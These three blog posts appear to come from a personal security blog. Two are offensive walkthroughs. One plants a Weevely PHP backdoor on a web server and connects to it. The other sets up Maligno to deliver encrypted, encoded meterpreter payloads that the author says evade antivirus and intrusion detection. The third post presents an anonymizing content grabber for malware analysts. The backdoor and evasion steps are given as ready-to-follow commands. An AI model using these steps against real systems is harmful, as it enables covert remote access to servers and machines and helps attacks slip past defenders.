Custom PHP backdoor shell with Weevely

by Cornel on 27/02/2015

Recently I’ve been finding the need more and more to have a reliable backdoor PHP shell that has a reputable history. From work experience I knew about the classic c99.php backdoor shell and knew that it wasn’t the direction I wanted to go in. If you haven’t read The Hacker Blog article on it here, it’s definitely worth a read.

So I came across Weevely. What an awesome little backdoor! Here I’m just going to walk through the basic usage of it to get you up and running, definitely one of the easiest routes to go if you’re going to be uploading a backdoor anytime soon!

  1. Using Kali, Weevely is already built in, we can generate our backdoor with our password to connect to it. My password will be blagger.
    weevely generate blagger sneaky.php
    weevely1
  2. Next, for simplicity sake, I will upload the backdoor to my test web server using SFTP. Of course there are hundreds of other ways to get your PHP script onto a web server, but this is a demo. Because my web server is ran on Amazon’s Ec2, I need to remote in using a limited user account. Still I can upload the file to the tmp directory to be moved by root.
    weevely2
  3. Finally, I’ll SSH in and move the uploaded backdoor into the public facing web directory to allow access for Weevely to connect. Once it’s publicly accessible, browse to it in Weevely and your back door gets executed!
    weevely http://52.0.212.83/sneaky.php blagger
    weevely3

    weevely4

No Comments

Meterpreter over SSL with Maligno

by Cornel on 2/07/2014

So I’ve decided I want to have my meterpreter sessions encrypted to avoid layer 4 detection. It’s something I’ve wanted in the past but never really pursued, until I came across Maligno. Maligno is a platform from which you can launch metasploit payloads via https that are AES encrypted and base64 encoded. The payload to be pushed to the client can also be be encoded numerous times via any Metasploit encoders to avoid layer 7 detection.

This is the process of setting up your server:

  1. Download and extract Maligno here: Maligno
  2. Install the prerequisite binaries:
  3. sudo apt-get update && sudo apt-get install python-ipcalc

  4. Generate the self-signed SSL cert to be used on your server:
  5. ./certgen.sh

  6. Configure server.conf to allow the following:
    • Serve 3 different payloads to 3 different targets all over port 443
    • Serve via https
    • Scope to your network
    • Set the server IP to that of the Maligno host
    • maligno-conf

  7. Generate the python scripts for the clients to reach out to Maligno with:
  8. python clientgen.py -i 0 -f server.conf -o client1.py
    python clientgen.py -i 1 -f server.conf -o client2.py
    python clientgen.py -i 2 -f server.conf -o client3.py

  9. On a Windows machine, install python2.7, pycrypto and py2exe
  10. Generate executables from the python scripts using py2exe for all 3 target clients
  11. maligno-bins

  12. Start the Maligno server and the meterpreter handler to listen for incoming connections…
  13. maligno-start

  14. Upon execution of your crafted executables, an encrypted meterpreter session will be opened undetected by antivirus or NIDS.
  15. maligno-stager
    maligno-meterpreter
    maligno-vtresults
    Enjoy responsibly. BYOB.

No Comments

Anonymous Content Grabbing with Python

by Cornel on 22/01/2014

Anonymity

As a malware analyst, sometimes it’s necessary to obtain a sample of a website’s source code to manually evaluate any hidden malicious JavaScript. But why give up your IP address and possibly your exact whereabouts just to snoop around?

Fellow analysts, I give you my personal fully customized python-based anonymous browser, anonBrowser.py.

Nothing special, just a little terminal program that pulls a random proxy, emulates a random browser and pulls the specified content using it’s forged identity. Written so that it’s easy to understand and easy to customize should you like to make changes to it.

Usage: ./anonBrowser.py -s URL

 

No Comments